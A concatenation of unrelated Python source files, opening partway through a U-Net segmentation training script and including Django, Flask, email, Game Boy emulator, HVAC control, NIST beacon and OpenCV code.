row.append(fn_mask)
rows.append( np.hstack(row) )
grid_img = np.vstack(rows)
# print(grid_img.shape)
im = Image.fromarray(grid_img.astype('uint8'), 'RGB')
im.show()
im.save("images/unet_train_demo.png")
def calc_loss(logits: torch.Tensor, targets: torch.Tensor):
# bce_loss = F.binary_cross_entropy_with_logits(logits, targets)
# focal_loss = focal_metric(logits, targets, alpha=0.5, gamma=2.0)
preds = torch.sigmoid(logits)
jaccard_loss = 1.0 - jaccard_iou(preds, targets, smooth=1.0)
# dice_loss = 1.0 - dice_coeff(preds, targets, smooth=1.0)
# tversky_loss = 1.0 - tversky_measure(preds, targets, alpha=0.3, beta=0.7, smooth=1.0)
return jaccard_loss
def calc_metrics(logits: torch.Tensor, targets: torch.Tensor):
preds = torch.sigmoid(logits)
bce = F.binary_cross_entropy_with_logits(logits, targets)
metrics = {
"acc": pixel_accuracy(preds, targets, threshold=0.5).item(),
"bce": bce.item(),
"jaccard": jaccard_iou(preds, targets, smooth=1.0).item(),
"dice": dice_coeff(preds, targets, smooth=1.0).item(),
"tversky": tversky_measure(preds, targets, alpha=0.3, beta=0.7, smooth=1.0).item(),
"focal": focal_metric(logits, targets, alpha=0.5, gamma=2.0).item()
}
return metrics
if __name__ == "__main__":
MANUAL_SEED = 42
set_seed(MANUAL_SEED)
torch.backends.cudnn.benchmark = False
# Training data
save_final = True
run_validation = True
graph_metrics = True
view_results = True
view_threshold = 0.5
# Model Config
in_channels = 3
out_channels = 1
model_type = "unet" # unet, unet_nested, unet_nested_deep
filters = 4 # 16
activation = "relu" # relu, leaky_relu, silu, mish
# Training Hyperparameters
input_size = 192 # 400
train_epochs = 280 # 20
val_epochs = 4
train_size = 256 # 8000
batch_size = 16 # 4
shuffle = False
num_workers = 6
drop_last = False
# Mixed precision
use_amp = False
detect_grad_failures = False # sets autograd.detect_anomaly
# Optimization
optim_type = 'adamw' # sgd 1e-1, rmsprop 1e-3, adam 4e-3, adamw 4e-3, adagrad 1e-2
base_lr = 4e-3 # 1e-1
momentum = 0.9 # 0.9
nesterov = True
weight_decay = 5e-4 # 0, 1e-5, 3e-5, *1e-4, 3e-4, *5e-4, 3e-4, 1e-3, 1e-2
clip_grad_max = None # None is no clipping, otherwise use a positive float
scheduler_type = 'step' # step, plateau, exp
lr_milestones = [200, 250] # for StepLR, [10, 15]
lr_gamma = 0.2
plateau_patience = 20
# Dataset parameters
bkg_path = 'backgrounds' # path to background images, None is a random color background
target_size = 20 # Smallest target size
fill_prob = 0.9
expansion_factor = 1 # generate higher resolution targets and downscale, improves aliasing effects
set_mean = [0.5, 0.5, 0.5]
set_std = [0.5, 0.5, 0.5]
target_transforms = T.Compose([
T.RandomPerspective(distortion_scale=0.5, p=1.0),
])
train_transforms = T.Compose([
CustomTransformation(),
T.ToTensor(),
AddGaussianNoise(std=0.01)
])
val_transforms = T.Compose([
T.ToTensor(),
])
# Prepare datasets
train_dataset = LiveSegmentDataset(length=train_size,
input_size=input_size, target_size=target_size,
expansion_factor=expansion_factor, bkg_path=bkg_path, fill_prob=fill_prob,
target_transforms=target_transforms, transforms=train_transforms)
train_loader = DataLoader(dataset=train_dataset, batch_size=batch_size ,shuffle=shuffle,
num_workers=num_workers, drop_last=drop_last, persistent_workers=(True if num_workers > 0 else False))
print("mean :", set_mean)
print("std :", set_std)
# Create model and optimizer
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print('device :', device)
model = UNet(in_channels, out_channels, model_type, filters, activation, set_mean, set_std).to(device)
# Uncomment to test the model before training
# view_outputs(model, train_dataset, threshold=0.5); exit()
# TODO : split params so there is no weight decay on batchnorm
# Setup optimizer
if optim_type == 'sgd':
optimizer = optim.SGD(model.parameters(), lr=base_lr, momentum=momentum, nesterov=nesterov, weight_decay=weight_decay)
elif optim_type == 'rmsprop':
optimizer = optim.RMSprop(model.parameters(), lr=base_lr, weight_decay=weight_decay, momentum=momentum)
elif optim_type == 'adam':
optimizer = optim.Adam(model.parameters(), lr=base_lr)
elif optim_type == 'adamw':
optimizer = optim.AdamW(model.parameters(), lr=base_lr, weight_decay=weight_decay)
elif optim_type == 'adagrad':
optimizer = optim.Adagrad(model.parameters(), lr=base_lr, weight_decay=weight_decay)
# Setup scheduler
if scheduler_type == 'step':
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=lr_milestones, gamma=lr_gamma)
elif scheduler_type == 'plateau':
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=lr_gamma, patience=plateau_patience, verbose=True)
elif scheduler_type == 'exp':
scheduler = optim.lr_scheduler.ExponentialLR(optimizer, gamma=lr_gamma)
else:
scheduler = None
# Setup amp
if use_amp:
scalar = amp.GradScaler()
# Setup run data
base_save = f"runs/unet"
save_path = lambda r, t : base_save + '/run{:05d}_{}.pth'.format(r, t)
if not os.path.exists(base_save):
os.makedirs(base_save)
def time_to_string(t):
if t > 3600: return "{:.2f} hours".format(t/3600)
if t > 60: return "{:.2f} minutes".format(t/60)
else: return "{:.2f} seconds".format(t)
current_run = 0
with open('runs/LASTRUN.txt') as f:
current_run = int(f.read()) + 1
with open('runs/LASTRUN.txt', 'w') as f:
f.write("%s\n" % current_run)
print("current run :", current_run)
# Create logger
log_name = "run{:05d}".format(current_run)
log_headers = ['epoch', 'iterations', 'elapsed_time', 'lr', 'train_loss',
'acc', 'bce', 'jaccard', 'dice', 'tversky', 'focal']
logger = Logger(name=log_name, headers=log_headers, folder=base_save)
run_stats = []
# Training loop
print(" * Start training...")
t0 = time.time()
iterations = 0
for epoch in range(train_epochs): # loop over the dataset multiple times
t1 = time.time()
epoch_loss_total = 0.0
batch_metrics_total = Counter({})
model.train()
model.freeze_norm()
for batch_idx, (data, true_masks) in enumerate(train_loader):
data = data.to(device=device)
true_masks = true_masks.to(device=device)
optimizer.zero_grad() # TODO : test each optimizer for set_to_none=True
if use_amp:
with amp.autocast():
with torch.autograd.set_detect_anomaly(detect_grad_failures):
logits = model(data)
loss = calc_loss(logits, true_masks)
scalar.scale(loss).backward()
if clip_grad_max != None:
                    scalar.unscale_(optimizer)  # unscale before clipping; "scalar" is the GradScaler created above
torch.nn.utils.clip_grad_norm_(model.parameters(), clip_grad_max)
scalar.step(optimizer)
scalar.update()
else:
logits = model(data)
loss = calc_loss(logits, true_masks)
loss.backward()
if clip_grad_max != None:
torch.nn.utils.clip_grad_norm_(model.parameters(), clip_grad_max)
optimizer.step()
iterations += 1
# Update running metrics
batch_metrics = calc_metrics(logits, true_masks)
epoch_loss_total += loss.item()
batch_metrics_total += Counter(batch_metrics)
# END EPOCH LOOP
epoch_loss = epoch_loss_total/len(train_loader)
batch_metrics_avg = {k: v / len(train_loader) for k, v in batch_metrics_total.items()}
epoch_metrics = {
"epoch": epoch+1,
"iterations": iterations,
"elapsed_time": time.time()-t0,
"lr": optimizer.param_groups[0]['lr'],
"train_loss": epoch_loss
}
epoch_metrics.update(batch_metrics_avg)
logger.update(epoch_metrics)
run_stats.append(epoch_metrics)
if scheduler:
if type(scheduler) == optim.lr_scheduler.ReduceLROnPlateau:
scheduler.step(epoch_loss)
elif type(scheduler) == optim.lr_scheduler.MultiStepLR:
scheduler.step()
duration = time.time()-t1
remaining = duration*(train_epochs-epoch-1)
print("epoch {}. {} iterations: {}. loss={:.04f}. lr={:.06f}. elapsed={}. remaining={}.".format(epoch+1, iterations, time_to_string(duration), epoch_loss, optimizer.param_groups[0]['lr'], time_to_string(time.time()-t0), time_to_string(remaining)))
# END TRAIN LOOP
print('Finished Training. Duration={}. {} iterations.'.format(time_to_string(time.time()-t0), iterations))
print("Final stats:")
print("loss={:.05f}. acc={:.04f}. bce={:.05f}. jaccard={:.04f}. dice={:.04f}. tversky={:.04f}. focal={:.06f}.".format(epoch_metrics["train_loss"], epoch_metrics["acc"], epoch_metrics["bce"], epoch_metrics["jaccard"], epoch_metrics["dice"], epoch_metrics["tversky"], epoch_metrics["focal"]))
# Save Model
if save_final:
save_unet(model, save_path(current_run, "final"))
if run_validation:
print(" * Running validation...")
set_seed(MANUAL_SEED)
model.eval()
val_loss_total = 0.0
val_metrics_total = Counter({})
t0 = time.time()
for epoch in range(val_epochs):
t1 = time.time()
for batch_idx, (data, true_masks) in enumerate(train_loader):
data = data.to(device=device)
true_masks = true_masks.to(device=device)
with torch.no_grad():
if use_amp:
with amp.autocast():
logits = model(data)
loss = calc_loss(logits, true_masks)
else:
logits = model(data)
loss = calc_loss(logits, true_masks)
batch_metrics = calc_metrics(logits, true_masks)
val_loss_total += loss.item()
val_metrics_total += Counter(batch_metrics)
duration = time.time()-t1
print("validation {}/{}. elapsed={}. remaining={}.".format(epoch+1, val_epochs, time_to_string(time.time()-t0), time_to_string(remaining)))
# END VALIDATION LOOP
val_loss = val_loss_total/(val_epochs*len(train_loader))
val_metrics = {k: v/(val_epochs*len(train_loader)) for k, v in val_metrics_total.items()}
print("Validation stats:")
print("loss={:.05f}. acc={:.04f}. bce={:.05f}. jaccard={:.04f}. dice={:.04f}. tversky={:.04f}. focal={:.06f}.".format(val_loss, val_metrics["acc"], val_metrics["bce"], val_metrics["jaccard"], val_metrics["dice"], val_metrics["tversky"], val_metrics["focal"]))
if view_results:
view_outputs(model, train_dataset, threshold=view_threshold)
# Graph metrics
if graph_metrics:
line_colors = [
'#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#8c564b', '#e377c2', '#7f7f7f', '#bcbd22', '#17becf'
]
fig, ax = plt.subplots(2, 3, figsize=(12,8)) # w, h
font_size = 16
# loss, top 0
ax[0][0].set_xlabel('epochs', fontsize=font_size)
ax[0][0].set_ylabel('train loss', fontsize=font_size)
ax[0][0].set_yscale('log')
ax[0][0].tick_params(axis='y')
ax[0][0].plot(range(1, train_epochs+1), [x["train_loss"] for x in run_stats], color=line_colors[0], label="train loss")
# bce, top 1
ax[0][1].set_xlabel('epochs', fontsize=font_size)
ax[0][1].set_ylabel('bce', fontsize=font_size)
ax[0][1].set_yscale('log')
ax[0][1].tick_params(axis='y')
ax[0][1].plot(range(1, train_epochs+1), [x["bce"] for x in run_stats], color=line_colors[0], label="bce loss")
# focal, top 2
ax[0][2].set_xlabel('epochs', fontsize=font_size)
ax[0][2].set_ylabel('focal', fontsize=font_size)
ax[0][2].set_yscale('log')
ax[0][2].tick_params(axis='y')
ax[0][2].plot(range(1, train_epochs+1), [x["focal"] for x in run_stats], color=line_colors[0], label="focal loss")
# lr, bot 0
ax[1][0].set_xlabel('epochs', fontsize=font_size)
ax[1][0].set_ylabel('lr', fontsize=font_size)
ax[1][0].set_yscale('log')
ax[1][0].tick_params(axis='y')
ax[1][0].plot(range(1, train_epochs+1), [x["lr"] for x in run_stats], color=line_colors[0], label="lr")
# coef, bot 1
ax[1][1].set_xlabel('epochs', fontsize=font_size)
ax[1][1].set_ylabel('coefficients', fontsize=font_size)
ax[1][1].tick_params(axis='y')
coef = ["jaccard", "dice", "tversky"]
for i in range(len(coef)):
ax[1][1].plot(range(1, train_epochs+1), [x[coef[i]] for x in run_stats], color=line_colors[i], label=coef[i])
ax[1][1].legend()
# acc, bot 2
ax[1][2].set_xlabel('epochs', fontsize=font_size)
ax[1][2].set_ylabel('acc', fontsize=font_size)
# ax[1][2].set_yscale('log')
ax[1][2].tick_params(axis='y')
ax[1][2].plot(range(1, train_epochs+1), [x["acc"] for x in run_stats], color=line_colors[0], label="acc")
fig.tight_layout() # otherwise the right y-label is slightly clipped
fig.savefig("{}/run{:05d}_metrics.png".format(base_save, current_run), bbox_inches='tight')
plt.show()
|
from django.urls import path
from .views import home
app_name='Core'
urlpatterns=[
path('', home,name="home_view"),
] |
import requests
from nistrecord import NistRecord
class NistFetcher(object):
def __init__(self):
self.certificate = None
r = requests.get('https://beacon.nist.gov/certificate/beacon.cer')
if r.status_code != 200:
raise IOError
else:
self.certificate = r.content
def currentRecord(self, timestamp):
r = requests.get('https://beacon.nist.gov/rest/record/' + str(timestamp))
if r.status_code == 200:
return NistRecord(r.content, self.certificate)
else:
raise IOError
def previousRecord(self,timestamp):
r = requests.get('https://beacon.nist.gov/rest/record/previous/' + str(timestamp))
if r.status_code == 200:
return NistRecord(r.content, self.certificate)
else:
#print r.status_code
#print r.headers
#print r.content
raise IOError
def nextRecord(self,timestamp):
r = requests.get('https://beacon.nist.gov/rest/record/next/' + str(timestamp))
if r.status_code == 200:
return NistRecord(r.content, self.certificate)
else:
raise IOError
def lastRecord(self):
r = requests.get('https://beacon.nist.gov/rest/record/last')
if r.status_code == 200:
return NistRecord(r.content, self.certificate)
else:
raise IOError
def startChainRecord(self, timestamp):
r = requests.get('https://beacon.nist.gov/rest/record/start-chain/' + str(timestamp))
if r.status_code == 200:
return NistRecord(r.content, self.certificate)
else:
raise IOError
def verifyChain(self, fromTimestamp):
steps = 1
cr = self.currentRecord(fromTimestamp)
if not cr.isVerified:
raise Exception('CurrentRecord %d not verified' % (cr.timestamp))
sr = self.startChainRecord(fromTimestamp)
if not sr.isVerified:
raise Exception('StartChainRecord %d not verified' % (sr.timestamp))
while (cr.timestamp >= sr.timestamp):
pr = self.previousRecord(cr.timestamp)
if not pr.isVerified:
raise Exception('ChainRecord %d not verified' % (pr.timestamp))
            if pr.randomNumber != cr.previousRecord:  # chain is broken when the previous output does not match
                raise Exception('Chain broken between %d and %d' % (pr.timestamp, cr.timestamp))
            cr = pr
            steps += 1
return steps |
#!/usr/bin/env python
import sys
import os
BASE_DIR = os.path.abspath( os.path.join( os.path.dirname( __file__ ), ".." ) )
path = os.path.abspath( os.path.join( BASE_DIR, "python" ) )
sys.path.append( path )
import numpy as np
import pylab as pl
import momo
width = 150
height = 50
radius = 10
cell_size = 1
convert = momo.convert( { "x1": 0, "y1": 0, "x2": width, "y2": height }, cell_size )
compute_features = momo.features.test.compute_features( convert, radius = radius )
frame = np.array( [
[15.0, 15.0, 0.0, 0.0],
[135.0, 35.0, 0.0, 0.0]
] )
features = compute_features( frame )
pl.imshow( features[0], pl.cm.jet, None, None, "none" )
pl.show()
|
"""
A Simple Interface to Sending Email
Ben Adida (ben@adida.net)
"""
from base import config
from smtplib import SMTP
from email.MIMEText import MIMEText
from email.Header import Header
from email.Utils import parseaddr, formataddr
SMTP_SERVER = config.SMTP_SERVER
def simple_send(recipient, sender, subject, body, reply_to=None):
"""Send an email.
All arguments should be Unicode strings (plain ASCII works as well).
Only the real name part of sender and recipient addresses may contain
non-ASCII characters.
The email will be properly MIME encoded and delivered though SMTP to
localhost port 25. This is easy to change if you want something different.
The charset of the email will be the first one out of US-ASCII, ISO-8859-1
and UTF-8 that can represent all the characters occurring in the email.
"""
msg = createMessage(recipient, sender, subject, body, reply_to)
# Send the message via SMTP to localhost:25
smtp = SMTP(SMTP_SERVER)
if config.SMTP_USER:
smtp.login(config.SMTP_USER, config.SMTP_PASSWORD)
smtp.sendmail(sender, recipient, msg.as_string())
smtp.quit()
def no_send(recipient, sender, subject, body, reply_to=None):
msg = createMessage(recipient, sender, subject, body, reply_to)
print "== CONFIG SAYS NOT TO SEND EMAIL, so here it is =="
print msg.as_string()
print "==================================================\n\n"
def createMessage(recipients, sender, subject, body, reply_to=None):
# Header class is smart enough to try US-ASCII, then the charset we
# provide, then fall back to UTF-8.
header_charset = 'ISO-8859-1'
# We must choose the body charset manually
for body_charset in 'US-ASCII', 'ISO-8859-1', 'UTF-8':
try:
body.encode(body_charset)
except UnicodeError:
pass
else:
break
# Split real name (which is optional) and email address parts
sender_name, sender_addr = parseaddr(sender)
reply_to_name, reply_to_addr = parseaddr(reply_to)
recipient_names = []
recipient_addrs = []
for recipient in recipients.split(', '):
recipient_names.append(parseaddr(recipient)[0])
recipient_addrs.append(parseaddr(recipient)[1])
# We must always pass Unicode strings to Header, otherwise it will
# use RFC 2047 encoding even on plain ASCII strings.
sender_name = str(Header(unicode(sender_name), header_charset))
reply_to_name = str(Header(unicode(reply_to_name), header_charset))
    # Rebinding the loop variable would not update the list, so rebuild it instead
    recipient_names = [str(Header(unicode(name), header_charset)) for name in recipient_names]
    # Make sure email addresses do not contain non-ASCII characters
    sender_addr = sender_addr.encode('ascii')
    reply_to_addr = reply_to_addr.encode('ascii')
    recipient_addrs = [addr.encode('ascii') for addr in recipient_addrs]
# Create the message ('plain' stands for Content-Type: text/plain)
msg = MIMEText(body.encode(body_charset), 'plain', body_charset)
msg['From'] = formataddr((sender_name, sender_addr))
foo = [(recipient_names[i], recipient_addrs[i]) for i in range(len(recipient_names))]
msg['To'] = ", ".join([formataddr(f) for f in foo])
msg['Reply-To'] = formataddr((reply_to_name, reply_to_addr))
msg['Subject'] = Header(unicode(subject), header_charset)
return msg
# don't send email if config says not to
if not config.SEND_MAIL:
simple_send = no_send
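# ---------------------------------------------------------------------------
# Hypothetical usage sketch (added for illustration; the addresses below are
# placeholders, not real accounts). With config.SEND_MAIL set to False the
# rebinding above turns simple_send into no_send, so running this only prints
# the MIME-encoded message instead of contacting the SMTP server.
if __name__ == "__main__":
    simple_send(
        recipient=u"Alice Example <alice@example.com>, Bob Example <bob@example.com>",
        sender=u"Carol Example <carol@example.com>",
        subject=u"Weekly report",
        body=u"Plain ASCII body, so the charset loop above settles on US-ASCII.",
        reply_to=u"carol@example.com",
    )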
|
import imagesAlign as lk
import shared as sh
import os
import numpy as np
from matplotlib.pyplot import show, imshow, figure, title
# load patch
img_dir = '../../test-ballots/carlini/'
Iref=sh.standardImread(os.path.join(img_dir,'0.tif'),flatten=True)
M = np.zeros((Iref.shape[0],Iref.shape[1], 11))
for i in range(11):
I=sh.standardImread(os.path.join(img_dir,str(i+1)+'.tif'),flatten=True)
Inorm = np.zeros(Iref.shape)
# make patch the same size as Iref
min0 = min(I.shape[0],Iref.shape[0])
min1 = min(I.shape[1],Iref.shape[1])
Inorm[0:min0,0:min1] = I[0:min0,0:min1]
diff0 = Iref.shape[0] - I.shape[0]
diff1 = Iref.shape[1] - I.shape[1]
if diff0 > 0:
Inorm[I.shape[0]:I.shape[0]+diff0,:] = 1
if diff1 > 0:
Inorm[:,I.shape[1]:I.shape[1]+diff1] = 1
res=lk.imagesAlign(Inorm,Iref)
M[:,:,i] = res[1]
meanOverlay = np.mean(M,axis=2)
minOverlay = np.min(M,axis=2)
maxOverlay = np.max(M, axis=2)
figure(0); imshow(meanOverlay,cmap='gray'); title('mean')
figure(1); imshow(minOverlay,cmap='gray'); title('min')
figure(2); imshow(maxOverlay,cmap='gray'); title('max')
show()
|
# Generated by Django 2.2.2 on 2019-10-15 09:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='missao',
name='foiConcluida',
),
migrations.AddField(
model_name='missao',
name='categoria',
field=models.CharField(choices=[('Concluída', 'Concluída'), ('Inconcluída', 'Inconcluída')], default=2, max_length=12),
preserve_default=False,
),
]
|
from gameboy.memory.memory_region import MemoryRegion
class InterruptFlagRegister(MemoryRegion):
INTERRUPT_VBLANK = 0x01
INTERRUPT_LCDC = 0x02
INTERRUPT_TIMA = 0x04
INTERRUPT_SERIAL = 0x08
INTERRUPT_JOYPAD = 0x10
INTERRUPT_MASK = 0x1F
def __init__(self):
super().__init__(bytearray(1), 0xFF0F)
self._data[0] = 0xE0
def set_vblank_interrupt(self):
self._data[0] = self._data[0] | self.INTERRUPT_VBLANK
def set_lcdc_interrupt(self):
self._data[0] = self._data[0] | self.INTERRUPT_LCDC
def set_tima_interrupt(self):
self._data[0] = self._data[0] | self.INTERRUPT_TIMA
def set_serial_interrupt(self):
self._data[0] = self._data[0] | self.INTERRUPT_SERIAL
def set_joypad_interrupt(self):
self._data[0] = self._data[0] | self.INTERRUPT_JOYPAD
def clear_vblank_interrupt(self):
self._data[0] = self._data[0] & ~self.INTERRUPT_VBLANK
def clear_lcdc_interrupt(self):
self._data[0] = self._data[0] & ~self.INTERRUPT_LCDC
def clear_tima_interrupt(self):
self._data[0] = self._data[0] & ~self.INTERRUPT_TIMA
def clear_serial_interrupt(self):
self._data[0] = self._data[0] & ~self.INTERRUPT_SERIAL
def clear_joypad_interrupt(self):
self._data[0] = self._data[0] & ~self.INTERRUPT_JOYPAD
def clear_interrupt_by_bit(self, bit_to_clear: int) -> None:
if bit_to_clear == self.INTERRUPT_VBLANK:
return self.clear_vblank_interrupt()
if bit_to_clear == self.INTERRUPT_LCDC:
return self.clear_lcdc_interrupt()
if bit_to_clear == self.INTERRUPT_TIMA:
return self.clear_tima_interrupt()
if bit_to_clear == self.INTERRUPT_SERIAL:
return self.clear_serial_interrupt()
if bit_to_clear == self.INTERRUPT_JOYPAD:
return self.clear_joypad_interrupt()
raise Exception('invalid bit to clear: {}'.format(bit_to_clear))
def write_byte(self, address: int, value: int):
        # The unused upper bits (0xE0) of the interrupt flag register always read as "1"s
return super().write_byte(address, value | 0xE0)
def get_interrupt_bits(self):
return self.read_byte(0xFF0F) & self.INTERRUPT_MASK
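# Minimal smoke test (added for illustration). It assumes, as the methods above
# already do, that MemoryRegion exposes read_byte()/write_byte() over the backing
# bytearray registered at 0xFF0F.
if __name__ == "__main__":
    flags = InterruptFlagRegister()
    flags.set_vblank_interrupt()
    flags.set_tima_interrupt()
    assert flags.get_interrupt_bits() == 0x05   # VBLANK | TIMA
    flags.clear_interrupt_by_bit(InterruptFlagRegister.INTERRUPT_VBLANK)
    assert flags.get_interrupt_bits() == 0x04   # only TIMA remains
    flags.write_byte(0xFF0F, 0x00)
    assert flags.get_interrupt_bits() == 0x00   # writes keep only the low 5 interrupt bits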
|
# -*- coding: UTF-8 -*-
from flask import Flask
from .web.ban import BanAPI
from .web.server import ServerAPI
from .config import Config
from .db import DB
class WebUI(object):
def __init__(self, config_file):
app = Flask(__name__, template_folder="web/templates")
self.config = Config(config_file)
self.ip_dbs = self.init_db(self.config.get_database('file'))
app.debug = True
app.add_url_rule('/bans/<ip>',
view_func=BanAPI.as_view('bans', bandb=self.ip_dbs,
user=self.config.get_gui('user'),
passwd=self.config.get_gui('pass')))
app.add_url_rule('/server/', view_func=ServerAPI.as_view('servers',
user=self.config.get_gui('user'),
passwd=self.config.get_gui('pass')))
app.run(host=self.config.get_gui('listen'),
port=int(self.config.get_gui('port')))
def init_db(self, dbfile):
''' Init database '''
bdb = DB(dbfile)
if bdb.exists() is not True:
return None
return bdb
|
import datetime, time, math, pytz, os, sys
import pandas as pd
import yaml
from NormalSchedule import NormalSchedule
from DataManager import DataManager
from Advise import Advise
from xbos import get_client
from xbos.services.hod import HodClientHTTP
from xbos.devices.thermostat import Thermostat
from xbos.services.pundat import DataClient, make_dataframe
# TODO only one zone at a time, making multizone comes soon
filename = "thermostat_changes.txt" # file in which the thermostat changes are recorded
# the main controller
def hvac_control(cfg, tstats, normal_zones):
now = datetime.datetime.utcnow().replace(tzinfo=pytz.timezone("UTC"))
dataManager = DataManager(cfg, now=now)
t_high, t_low, t_mode = dataManager.thermostat_setpoints()
# document the "before" state
try:
f = open(filename, 'a')
f.write("Did read: " + str(t_low) + ", " + str(t_high) + ", " + str(t_mode) + "\n")
f.close()
except:
print "Could not document changes."
    # choose the appropriate setpoints according to weekday and time
weekno = now.astimezone(tz=pytz.timezone(cfg["Data_Manager"]["Pytz_Timezone"])).weekday()
if weekno<5:
now_time = now.astimezone(tz=pytz.timezone(cfg["Data_Manager"]["Pytz_Timezone"])).time()
if now_time >= datetime.time(18,0) or now_time < datetime.time(7,0):
heating_setpoint = 62.
cooling_setpoint = 85.
else:
heating_setpoint = 70.
cooling_setpoint = 76.
else:
heating_setpoint = 62.
cooling_setpoint = 85.
try:
Prep_Therm = dataManager.preprocess_therm()
adv = Advise(now.astimezone(tz=pytz.timezone(cfg["Data_Manager"]["Pytz_Timezone"])),
dataManager.preprocess_occ(),
Prep_Therm,
dataManager.weather_fetch(),
cfg["Energy_rates"],
cfg["Advise"]["Lambda"],
cfg["Interval_Length"],
cfg["Advise"]["Hours"],
cfg["Advise"]["Print_Graph"],
cfg["Advise"]["Maximum_Safety_Temp"],
cfg["Advise"]["Minimum_Safety_Temp"],
cfg["Advise"]["Heating_Consumption"],
cfg["Advise"]["Cooling_Consumption"],
cfg["Advise"]["Max_Actions"],
cfg["Advise"]["Thermal_Precision"])
action = adv.advise()
temp = float(Prep_Therm['t_next'][-1])
except:
e = sys.exc_info()[0]
print e
return False
# action "0" is Do Nothing, action "1" is Cooling, action "2" is Heating
if action == "0":
p = {"override": True, "heating_setpoint": math.floor(temp-0.1)-1, "cooling_setpoint": math.ceil(temp+0.1)+1, "mode": 3}
print "Doing nothing"
print p
# document changes
try:
f = open(filename, 'a')
f.write("Did write: " + str(math.floor(temp-0.1)-1) + ", " + str(math.ceil(temp+0.1)+1) + ", " + str(3) +"\n")
f.close()
except:
print "Could not document changes."
elif action == "1":
p = {"override": True, "heating_setpoint": heating_setpoint, "cooling_setpoint": math.floor(temp-0.1), "mode": 3}
print "Heating"
print p
# document changes
try:
f = open(filename, 'a')
f.write("Did write: " + str(heating_setpoint) + ", " + str(math.floor(temp-0.1)) + ", " + str(3) + "\n")
f.close()
except:
print "Could not document changes."
elif action == "2":
p = {"override": True, "heating_setpoint": math.ceil(temp+0.1), "cooling_setpoint": cooling_setpoint, "mode": 3}
print "Cooling"
print p
# document changes
try:
f = open(filename, 'a')
f.write("Did write: " + str(math.ceil(temp+0.1)) + ", " + str(cooling_setpoint) + ", " + str(3) + "\n")
f.close()
except:
print "Could not document changes."
else:
print "Problem with action."
return False
    # try to commit the changes to the thermostat; if it doesn't work 10 times in a row, ignore and try again later
for z in normal_zones:
for i in range(10):
try:
tstats[z].write(p)
break
except:
if i == 9:
e = sys.exc_info()[0]
print e
return False
continue
return True
if __name__ == '__main__':
# read from config file
try:
yaml_filename = sys.argv[1]
except:
sys.exit("Please specify the configuration file as: python2 controller.py config_file.yaml")
with open(yaml_filename, 'r') as ymlfile:
cfg = yaml.load(ymlfile)
if not os.path.exists(filename):
f = open(filename , 'w')
f.close()
if cfg["Data_Manager"]["Server"]:
client = get_client(agent=cfg["Data_Manager"]["Agent_IP"], entity=cfg["Data_Manager"]["Entity_File"])
else:
client = get_client()
hc = HodClientHTTP("http://ciee.cal-sdb.org")
q = """SELECT ?uri ?zone WHERE {
?tstat rdf:type/rdfs:subClassOf* brick:Thermostat .
?tstat bf:uri ?uri .
?tstat bf:controls/bf:feeds ?zone .
};
"""
tstats = {}
for tstat in hc.do_query(q):
print tstat
tstats[tstat["?zone"]] = Thermostat(client, tstat["?uri"])
normal_zones = [cfg["Data_Manager"]["Zone"]]
starttime=time.time()
while True:
if not hvac_control(cfg, tstats, normal_zones):
print("Problem with MPC, entering normal schedule.")
normal_schedule = NormalSchedule(cfg, tstats, normal_zones)
normal_schedule.normal_schedule()
print datetime.datetime.now()
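        # Sleep until the next 15-minute boundary measured from starttime, so control
        # cycles stay evenly spaced even when hvac_control itself takes a while to run.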
time.sleep(60.*15. - ((time.time() - starttime) % (60.*15.)))
|
import cv2
import numpy as np
def empty(a):
pass
def stackImages(scale,imgArray):
rows = len(imgArray)
cols = len(imgArray[0])
rowsAvailable = isinstance(imgArray[0], list)
width = imgArray[0][0].shape[1]
height = imgArray[0][0].shape[0]
if rowsAvailable:
for x in range ( 0, rows):
for y in range(0, cols):
if imgArray[x][y].shape[:2] == imgArray[0][0].shape [:2]:
imgArray[x][y] = cv2.resize(imgArray[x][y], (0, 0), None, scale, scale)
else:
imgArray[x][y] = cv2.resize(imgArray[x][y], (imgArray[0][0].shape[1], imgArray[0][0].shape[0]), None, scale, scale)
if len(imgArray[x][y].shape) == 2: imgArray[x][y]= cv2.cvtColor( imgArray[x][y], cv2.COLOR_GRAY2BGR)
imageBlank = np.zeros((height, width, 3), np.uint8)
hor = [imageBlank]*rows
hor_con = [imageBlank]*rows
for x in range(0, rows):
hor[x] = np.hstack(imgArray[x])
ver = np.vstack(hor)
else:
for x in range(0, rows):
if imgArray[x].shape[:2] == imgArray[0].shape[:2]:
imgArray[x] = cv2.resize(imgArray[x], (0, 0), None, scale, scale)
else:
imgArray[x] = cv2.resize(imgArray[x], (imgArray[0].shape[1], imgArray[0].shape[0]), None,scale, scale)
if len(imgArray[x].shape) == 2: imgArray[x] = cv2.cvtColor(imgArray[x], cv2.COLOR_GRAY2BGR)
hor= np.hstack(imgArray)
ver = hor
return ver
cap = cv2.VideoCapture(0)
#Define width
cap.set(3, 640)
#Define height
cap.set(4, 480)
#change brightness
cap.set(10, 200)
cv2.namedWindow("TrackBars")
cv2.resizeWindow("TrackBars", 640, 240)
cv2.createTrackbar("Hue Min", "TrackBars", 73, 179, empty)
cv2.createTrackbar("Hue Max", "TrackBars", 96, 179, empty)
cv2.createTrackbar("Sat Min", "TrackBars", 37, 255, empty)
cv2.createTrackbar("Sat Max", "TrackBars", 115, 255, empty)
cv2.createTrackbar("Val Min", "TrackBars", 170, 255, empty)
cv2.createTrackbar("Val Max", "TrackBars", 255, 255, empty)
videoBackground = cv2.VideoCapture("C:/Users/Zac/Desktop/OpenCV/Images/ConcertCrowdBackground.mp4")
while True:
success, imgCamera = cap.read()
imgCameraHSV = cv2.cvtColor(imgCamera, cv2.COLOR_BGR2HSV)
h_min = cv2.getTrackbarPos("Hue Min", "TrackBars")
h_max = cv2.getTrackbarPos("Hue Max", "TrackBars")
s_min = cv2.getTrackbarPos("Sat Min", "TrackBars")
s_max = cv2.getTrackbarPos("Sat Max", "TrackBars")
v_min = cv2.getTrackbarPos("Val Min", "TrackBars")
v_max = cv2.getTrackbarPos("Val Max", "TrackBars")
lower = np.array([h_min, s_min, v_min])
upper = np.array([h_max, s_max, v_max])
mask = cv2.inRange(imgCameraHSV, lower, upper)
imgResult = cv2.bitwise_and(imgCamera, imgCamera, mask = mask)
